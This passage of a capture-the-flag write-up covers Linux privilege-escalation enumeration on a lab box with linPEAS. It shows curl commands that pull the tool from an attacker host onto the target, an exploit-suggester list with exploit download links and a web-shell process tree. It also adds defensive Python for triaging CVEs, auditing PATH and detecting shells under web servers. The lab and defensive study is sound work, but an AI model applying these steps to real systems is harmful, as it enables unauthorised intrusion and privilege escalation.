PEAS


sh-4.2$ curl -s http://10.10.14.2/linpeas.sh -o /dev/shm/linpeas.sh ; chmod 755 /dev/shm/linpeas.sh

Delivery complete

sh-4.2$ ./linpeas.sh
sh: ./linpeas.sh: Permission denied

I am unable to execute PEAS as the apache user from /dev/shm. This is very unusual.

[brucetherealadmin@armageddon ~]$ curl -s http://10.10.14.2/linpeas.sh -o /home/brucetherealadmin/linpeas.sh ; chmod 755 /home/brucetherealadmin/linpeas.sh

Since I moved laterally to the brucetherealadmin user and upgraded the shell session, I will re-attempt it as that user.

This time, I am able to execute PEAS.

CVEs


The target system is confirmed to be vulnerable to CVE-2021-4034 (PwnKit).

╔══════════╣ Executing Linux Exploit Suggester
 https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2016-5195] dirtycow
 
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
 
[+] [CVE-2016-5195] dirtycow 2
 
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,[ RHEL=5|6|7 ],ubuntu=14.04|12.04,ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
   Download URL: https://www.exploit-db.com/download/40839
   ext-url: https://www.exploit-db.com/download/40847
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
 
[+] [CVE-2017-1000253] PIE_stack_corruption
 
   Details: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.txt
   Exposure: probable
   Tags: RHEL=6,[ RHEL=7 ]{kernel:3.10.0-514.21.2|3.10.0-514.26.1}
   Download URL: https://www.qualys.com/2017/09/26/linux-pie-cve-2017-1000253/cve-2017-1000253.c
 
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
 
   Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
   Exposure: less probable
   Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
   Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
   Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
 
[+] [CVE-2021-3156] sudo Baron Samedit 2
 
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
[+] [CVE-2019-18634] sudo pwfeedback
 
   Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
   Exposure: less probable
   Tags: mint=19
   Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
   Comments: sudo configuration requires pwfeedback to be enabled.
 
[+] [CVE-2019-15666] XFRM_UAF
 
   Details: https://duasynt.com/blog/ubuntu-centos-redhat-privesc
   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled
 
[+] [CVE-2018-1000001] RationalLove
 
   Details: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/
   Exposure: less probable
   Tags: debian=9{libc6:2.24-11+deb9u1},ubuntu=16.04.3{libc6:2.23-0ubuntu9}
   Download URL: https://www.halfdog.net/Security/2017/LibcRealpathBufferUnderflow/RationalLove.c
   Comments: kernel.unprivileged_userns_clone=1 required
 
[+] [CVE-2017-7308] af_packet
 
   Details: https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html
   Exposure: less probable
   Tags: ubuntu=16.04{kernel:4.8.0-(34|36|39|41|42|44|45)-generic}
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2017-7308/poc.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2017-7308/poc.c
   Comments: CAP_NET_RAW cap or CONFIG_USER_NS=y needed. Modified version at 'ext-url' adds support for additional kernels
 
[+] [CVE-2017-6074] dccp
 
   Details: http://www.openwall.com/lists/oss-security/2017/02/22/3
   Exposure: less probable
   Tags: ubuntu=(14.04|16.04){kernel:4.4.0-62-generic}
   Download URL: https://www.exploit-db.com/download/41458
   Comments: Requires Kernel be built with CONFIG_IP_DCCP enabled. Includes partial SMEP/SMAP bypass
 
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
 
   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: less probable
   Tags: debian=7.7|8.5|9.0,ubuntu=14.04.2|16.04.2|17.04,fedora=22|25,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
 
[+] [CVE-2016-2384] usb-midi
 
   Details: https://xairy.github.io/blog/2016/cve-2016-2384
   Exposure: less probable
   Tags: ubuntu=14.04,fedora=22
   Download URL: https://raw.githubusercontent.com/xairy/kernel-exploits/master/CVE-2016-2384/poc.c
   Comments: Requires ability to plug in a malicious USB device and to execute a malicious binary as a non-privileged user
 
[+] [CVE-2015-9322] BadIRET
 
   Details: http://labs.bromium.com/2015/02/02/exploiting-badiret-vulnerability-cve-2014-9322-linux-kernel-privilege-escalation/
   Exposure: less probable
   Tags: RHEL<=7,fedora=20
   Download URL: http://site.pi3.com.pl/exp/p_cve-2014-9322.tar.gz
 
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
 
   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Tags: ubuntu=(14.04|15.10){kernel:4.2.0-(18|19|20|21|22)-generic}
   Download URL: https://www.exploit-db.com/download/39166
 
[+] [CVE-2015-8660] overlayfs (ovl_setattr)
 
   Details: http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/39230
 
[+] [CVE-2015-3246] userhelper
 
   Details: https://www.qualys.com/2015/07/23/cve-2015-3245-cve-2015-3246/cve-2015-3245-cve-2015-3246.txt
   Exposure: less probable
   Tags: RHEL=6{libuser:0.56.13-(4|5).el6},RHEL=6{libuser:0.60-5.el7},fedora=13|19|20|21|22
   Download URL: https://www.exploit-db.com/download/37706
   Comments: RHEL 5 is also vulnerable, but installed version of glibc (2.5) lacks functions needed by roothelper.c
 
[+] [CVE-2015-3202] fuse (fusermount)
 
   Details: http://seclists.org/oss-sec/2015/q2/520
   Exposure: less probable
   Tags: debian=7.0|8.0,ubuntu=*
   Download URL: https://www.exploit-db.com/download/37089
   Comments: Needs cron or system admin interaction
 
[+] [CVE-2014-5207] fuse_suid
 
   Details: https://www.exploit-db.com/exploits/34923/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/34923
 
[+] [CVE-2014-4014] inode_capable
 
   Details: http://www.openwall.com/lists/oss-security/2014/06/10/4
   Exposure: less probable
   Tags: ubuntu=12.04
   Download URL: https://www.exploit-db.com/download/33824
 
[+] [CVE-2014-0196] rawmodePTY
 
   Details: http://blog.includesecurity.com/2014/06/exploit-walkthrough-cve-2014-0196-pty-kernel-race-condition.html
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/33516
 
[+] [CVE-2016-0728] keyring
 
   Details: http://perception-point.io/2016/01/14/analysis-and-exploitation-of-a-linux-kernel-vulnerability-cve-2016-0728/
   Exposure: less probable
   Download URL: https://www.exploit-db.com/download/40003
   Comments: Exploit takes about ~30 minutes to run. Exploit is not reliable, see: https://cyseclabs.com/blog/cve-2016-0728-poc-not-working
 
 
╔══════════╣ Executing Linux Exploit Suggester 2
 https://github.com/jondonas/linux-exploit-suggester-2
  [1] exploit_x
      CVE-2018-14665
      Source: http://www.exploit-db.com/exploits/45697
  [2] pp_key
      CVE-2016-0728
      Source: http://www.exploit-db.com/exploits/39277
  [3] timeoutpwn
      CVE-2014-0038
      Source: http://www.exploit-db.com/exploits/31346

Some more CVEs
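The suggester output above is long and most entries are marked "less probable"; what a practitioner wants from it is the short list of CVEs to verify and patch, ordered by exposure, with the distro tag that actually matched (LES brackets the matched tag, e.g. "[ RHEL=7 ]") and any prerequisite noted under Comments. The parser below is an added example written for this page, not part of linPEAS or linux-exploit-suggester; the sample text is a constructed, abbreviated excerpt in the same format as the run above.

```python
import re

# Constructed sample in the linux-exploit-suggester output format shown above
# (three entries, trimmed; not the full run from the page).
SAMPLE_LES_OUTPUT = """\
[+] [CVE-2016-5195] dirtycow
 
   Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
   Exposure: highly probable
   Tags: debian=7|8,[ RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7} ],ubuntu=16.04|14.04|12.04
   Download URL: https://www.exploit-db.com/download/40611
   Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
 
[+] [CVE-2021-4034] PwnKit
 
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
   Exposure: less probable
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,debian=7|8|9|10|11,fedora,manjaro
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
 
[+] [CVE-2017-1000366,CVE-2017-1000379] linux_ldso_hwcap_64
 
   Details: https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt
   Exposure: probable
   Tags: debian=7.7|8.5|9.0,centos=7.3.1611
   Download URL: https://www.qualys.com/2017/06/19/stack-clash/linux_ldso_hwcap_64.c
   Comments: Uses "Stack Clash" technique, works against most SUID-root binaries
"""

# Lower rank = more likely to apply to this host.
EXPOSURE_RANK = {"highly probable": 0, "probable": 1, "less probable": 2}

HEADER_RE = re.compile(r"^\[\+\] \[(?P<cves>[^\]]+)\] (?P<name>.+)$")
FIELD_RE = re.compile(
    r"^\s+(?P<key>Details|Exposure|Tags|Download URL|ext-url|Comments):\s*(?P<val>.*)$"
)
MATCHED_TAG_RE = re.compile(r"\[ (.+?) \]")  # LES brackets the tag that matched the host


def parse_les(text):
    """Parse LES output into a list of finding dicts (one per '[+]' header)."""
    findings = []
    current = None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = {"cves": m.group("cves").split(","), "name": m.group("name"),
                       "exposure": "", "tags": "", "comments": "", "details": []}
            findings.append(current)
            continue
        if current is None:
            continue
        m = FIELD_RE.match(line)
        if m:
            key, val = m.group("key"), m.group("val").strip()
            if key == "Exposure":
                current["exposure"] = val
            elif key == "Tags":
                current["tags"] = val
            elif key == "Comments":
                current["comments"] = val
            elif key == "Details":
                current["details"].append(val)
        elif line.strip().startswith("http"):
            # Continuation line of a multi-URL Details field (seen in the run above).
            current["details"].append(line.strip())
    return findings


def matched_tag(finding):
    """Return the bracketed (host-matched) tag, or None if LES matched nothing."""
    m = MATCHED_TAG_RE.search(finding["tags"])
    return m.group(1) if m else None


def triage(findings):
    """Order findings by exposure (most likely first), matched tags before unmatched."""
    return sorted(findings, key=lambda f: (EXPOSURE_RANK.get(f["exposure"], 9),
                                           matched_tag(f) is None))


def report(findings):
    """One line per finding: CVEs, name, exposure, matched tag, prerequisites."""
    lines = []
    for f in triage(findings):
        lines.append("%s %s [%s] match=%s prereq=%s" % (
            ",".join(f["cves"]), f["name"], f["exposure"],
            matched_tag(f) or "-", f["comments"] or "-"))
    return lines


if __name__ == "__main__":
    print("\n".join(report(parse_les(SAMPLE_LES_OUTPUT))))
```

The matched-tag column is the part worth reading first: an entry whose distro tag is bracketed was matched against the host's release and kernel, whereas "less probable" entries without a match are generic suggestions that still need manual version checks before anyone acts on them.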

$PATH variable


The home directory of the brucetherealadmin user is part of the current $PATH variable.
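A user-writable directory in $PATH is a finding because any more privileged process that inherits that PATH (a cron job, a root script, sudo without secure_path) will resolve unqualified command names through it. The audit below is an added example, not linPEAS code; it classifies each PATH entry (relative, missing, world-writable without the sticky bit, group-writable, or owned by an account outside a trusted set, which defaults to root) and demonstrates itself on a constructed PATH built inside a temporary directory.

```python
import os
import shutil
import stat
import tempfile


def audit_path(path_value, trusted_uids=(0,)):
    """Classify each $PATH entry; returns {entry: [reasons]} for entries with a concern."""
    findings = {}
    for entry in path_value.split(":"):
        reasons = []
        if entry in ("", "."):
            reasons.append("relative entry: resolves to the current working directory")
        elif not os.path.isabs(entry):
            reasons.append("relative entry")
        else:
            try:
                st = os.stat(entry)
            except FileNotFoundError:
                reasons.append("directory does not exist")
            else:
                mode = st.st_mode
                if not stat.S_ISDIR(mode):
                    reasons.append("not a directory")
                else:
                    # Sticky-bit directories (like /tmp) protect other users' files,
                    # so only flag writability when the sticky bit is absent.
                    if not mode & stat.S_ISVTX:
                        if mode & stat.S_IWOTH:
                            reasons.append("world-writable")
                        elif mode & stat.S_IWGRP and st.st_gid != 0:
                            reasons.append("group-writable by gid %d" % st.st_gid)
                    if st.st_uid not in trusted_uids:
                        reasons.append("owned by uid %d, not a trusted account" % st.st_uid)
        if reasons:
            findings[entry] = reasons
    return findings


def demo():
    """Audit a constructed PATH: a normal bin dir, a world-writable dir, a sticky
    dir, an empty entry and a missing dir. Returns (dirs, findings)."""
    root = tempfile.mkdtemp(prefix="path-audit-")
    dirs = {
        "good": os.path.join(root, "bin"),
        "ww": os.path.join(root, "dropbox"),
        "sticky": os.path.join(root, "tmp"),
        "missing": os.path.join(root, "nope"),
    }
    os.mkdir(dirs["good"]); os.chmod(dirs["good"], 0o755)
    os.mkdir(dirs["ww"]); os.chmod(dirs["ww"], 0o777)
    os.mkdir(dirs["sticky"]); os.chmod(dirs["sticky"], 0o1777)
    path_value = ":".join([dirs["good"], dirs["ww"], dirs["sticky"], "", dirs["missing"]])
    try:
        return dirs, audit_path(path_value)
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    # Audit the real PATH of the current shell; pass the euid as trusted to see only
    # entries that some other account could tamper with.
    for entry, reasons in audit_path(os.environ.get("PATH", "")).items():
        print(entry, "->", "; ".join(reasons))
```

Entry order matters as much as the flags: a writable directory that precedes /usr/bin wins every lookup, so a fix is to remove the entry (or move it last) and to confirm that sudo's secure_path is set so privileged commands never see the user's PATH at all.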

Processes


╔══════════╣ Cleaned processes
 Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
root         1  0.0  0.1 128008  6680 ?        Ss   16:55   0:05 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root       489  0.0  0.1  39056  4604 ?        Ss   16:55   0:01 /usr/lib/systemd/systemd-journald
root       508  0.0  0.1 201112  4140 ?        Ss   16:55   0:00 /usr/sbin/lvmetad -f
root       521  0.0  0.1  48940  5396 ?        Ss   16:55   0:00 /usr/lib/systemd/systemd-udevd
root       643  0.0  0.0  55532   852 ?        S<sl 16:55   0:00 /sbin/auditd
dbus       666  0.0  0.0  66456  2568 ?        Ssl  16:55   0:02 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
  └─(Caps) 0x0000000020000000=cap_audit_write
polkitd    669  0.0  0.2 612232 10092 ?        Ssl  16:55   0:00 /usr/lib/polkit-1/polkitd --no-debug
root       671  0.0  0.0  21684  1308 ?        Ss   16:55   0:00 /usr/sbin/irqbalance --foreground
root       672  0.0  0.1 168148  5036 ?        Ss   16:55   0:00 /usr/bin/VGAuthService -s
root       673  0.1  0.1 355212  5308 ?        Ssl  16:55   0:18 /usr/bin/vmtoolsd
root       674  0.0  0.0  26384  1748 ?        Ss   16:55   0:00 /usr/lib/systemd/systemd-logind
root       675  0.0  0.2 474248 10764 ?        Ssl  16:55   0:04 /usr/sbin/NetworkManager --no-daemon
root       676  0.0  0.7 990532 29400 ?        Ssl  16:55   0:02 /usr/libexec/snapd/snapd
root       679  0.0  0.0 126392  1684 ?        Ss   16:55   0:00 /usr/sbin/crond -n
root       692  0.0  0.0 110208   856 tty1     Ss+  16:55   0:00 /sbin/agetty --noclear tty1 linux
root       963  0.0  0.4 574288 17440 ?        Ssl  16:55   0:02 /usr/bin/python2 -Es /usr/sbin/tuned -l -P
root       964  0.0  0.1 112936  4360 ?        Ss   16:55   0:00 /usr/sbin/sshd -D
bruceth+  5653  0.0  0.0 154728  2432 ?        S    19:49   0:00      _ sshd: brucetherealadmin@pts/0
bruceth+  5654  0.0  0.0 116056  2624 pts/0    Ss   19:49   0:00          _ -bash
bruceth+  6160  0.2  0.0 115016  3364 pts/0    S+   20:16   0:00              _ /bin/sh ./linpeas.sh
bruceth+ 10518  0.0  0.0 115016  2340 pts/0    S+   20:18   0:00                  _ /bin/sh ./linpeas.sh
bruceth+ 10522  0.0  0.0 155588  1936 pts/0    R+   20:18   0:00                  |   _ ps fauxwww
bruceth+ 10519  0.0  0.0 115016  2040 pts/0    R+   20:18   0:00                  _ /bin/sh ./linpeas.sh
bruceth+ 10521  0.0  0.0 115016  2040 pts/0    R+   20:18   0:00                  _ /bin/sh ./linpeas.sh
root       966  0.0  0.1 216400  5384 ?        Ssl  16:55   0:01 /usr/sbin/rsyslogd -n
root       967  0.0  0.3 450272 15488 ?        Ss   16:55   0:01 /usr/sbin/httpd -DFOREGROUND
apache    5163  4.0  0.2 450648  9896 ?        S    19:42   1:28  _ /usr/sbin/httpd -DFOREGROUND
apache    5164 88.2  0.2 450648  9752 ?        R    19:42  31:49  _ /usr/sbin/httpd -DFOREGROUND
apache    5512  0.0  0.0  11688  1140 ?        S    19:46   0:00  |   _ sh
apache    5587  0.0  0.0  11828  1772 ?        S    19:46   0:00  |       _ /bin/sh -i
apache    5165  6.6  0.2 450648  9952 ?        S    19:42   2:22  _ /usr/sbin/httpd -DFOREGROUND
apache    5167  0.0  0.2 450272  7968 ?        S    19:42   0:00  _ /usr/sbin/httpd -DFOREGROUND
apache    5168  0.0  0.2 450272  7968 ?        S    19:42   0:00  _ /usr/sbin/httpd -DFOREGROUND
apache    5169  0.0  0.2 450272  7968 ?        S    19:42   0:00  _ /usr/sbin/httpd -DFOREGROUND
apache    5170  0.0  0.2 450272  7968 ?        S    19:42   0:00  _ /usr/sbin/httpd -DFOREGROUND
mysql     1060  0.0  0.0 113416  1592 ?        Ss   16:55   0:00 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
mysql     1364  0.0  2.7 1102720 105488 ?      Sl   16:55   0:11  _ /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib64/mysql/plugin --log-error=/var/log/mariadb/mariadb.log --pid-file=/var/run/mariadb/mariadb.pid --socket=/var/lib/mysql/mysql.sock
root      1471  0.0  0.0  89744  2208 ?        Ss   16:55   0:00 /usr/libexec/postfix/master -w
postfix   1477  0.0  0.1  89916  4088 ?        S    16:55   0:00  _ qmgr -l -t unix -u
postfix   6141  0.1  0.1  89848  4072 ?        S    20:15   0:00  _ pickup -l -t unix -u

PEAS was able to list all the processes, including /usr/lib/polkit-1/polkitd --no-debug and /usr/sbin/crond -n, both running as root.
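The process tree above also shows, from the defender's side, exactly what a web-shell looks like in ps output: an interactive shell (sh, then /bin/sh -i) whose parent is an httpd worker running as apache. The detector below is an added example, not part of linPEAS; it reads `ps -eo user,pid,ppid,args` style output (the PPID column is assumed here because it makes the tree explicit, the forest view printed by linPEAS encodes it as indentation) and reports any shell whose ancestry passes through a web-server process, while leaving legitimate shells such as /bin/sh /usr/bin/mysqld_safe alone. The sample is constructed from the PIDs and commands above.

```python
# Constructed sample of `ps -eo user,pid,ppid,args` output, modelled on the
# process tree above. PIDs and commands are taken from the page; PPIDs are assumed.
SAMPLE_PS = """\
USER       PID  PPID COMMAND
root         1     0 /usr/lib/systemd/systemd --switched-root --system --deserialize 22
root       964     1 /usr/sbin/sshd -D
bruceth+  5653   964 sshd: brucetherealadmin@pts/0
bruceth+  5654  5653 -bash
root       967     1 /usr/sbin/httpd -DFOREGROUND
apache    5164   967 /usr/sbin/httpd -DFOREGROUND
apache    5512  5164 sh
apache    5587  5512 /bin/sh -i
apache    5165   967 /usr/sbin/httpd -DFOREGROUND
mysql     1060     1 /bin/sh /usr/bin/mysqld_safe --basedir=/usr
mysql     1364  1060 /usr/libexec/mysqld --basedir=/usr
"""

SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}
# Service binaries that should never have an interactive shell beneath them.
SERVICE_PARENTS = {"httpd", "apache2", "nginx", "php-fpm"}


def parse_ps(text):
    """Parse `ps -eo user,pid,ppid,args` output into {pid: {user, pid, ppid, args}}."""
    procs = {}
    for line in text.splitlines()[1:]:  # skip the header row
        parts = line.split(None, 3)
        if len(parts) < 4:
            continue
        user, pid, ppid, args = parts
        procs[int(pid)] = {"user": user, "pid": int(pid), "ppid": int(ppid), "args": args}
    return procs


def basename_of(args):
    """Program name from an args string: first word, leading '-' (login shell)
    and directory path removed, so '/bin/sh -i' and '-bash' give 'sh' and 'bash'."""
    first = args.split()[0].lstrip("-")
    return first.rsplit("/", 1)[-1]


def ancestors(procs, pid):
    """Parent chain of pid, nearest first, guarding against PPID cycles in snapshots."""
    chain, seen = [], set()
    p = procs.get(pid)
    while p and p["ppid"] in procs and p["ppid"] not in seen:
        seen.add(p["ppid"])
        p = procs[p["ppid"]]
        chain.append(p)
    return chain


def find_shells_under_services(procs):
    """Return (pid, user, args, service_pid) for every shell descended from a service."""
    hits = []
    for pid in sorted(procs):
        p = procs[pid]
        if basename_of(p["args"]) not in SHELLS:
            continue
        for anc in ancestors(procs, pid):
            if basename_of(anc["args"]) in SERVICE_PARENTS:
                hits.append((pid, p["user"], p["args"], anc["pid"]))
                break
    return hits


if __name__ == "__main__":
    for pid, user, args, svc in find_shells_under_services(parse_ps(SAMPLE_PS)):
        print("shell pid %d (%s) '%s' under service pid %d" % (pid, user, args, svc))
```

Run against a live host the same logic works on the output of `ps -eo user,pid,ppid,args`; the mysqld_safe case is included because a bare "is it a shell?" check would raise a false positive there, which is why the ancestry test is what triggers the alert.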

sudo privileges


PEAS was also able to pick up the sudo privileges of the brucetherealadmin user.

Mail


It appears that the brucetherealadmin user has mail.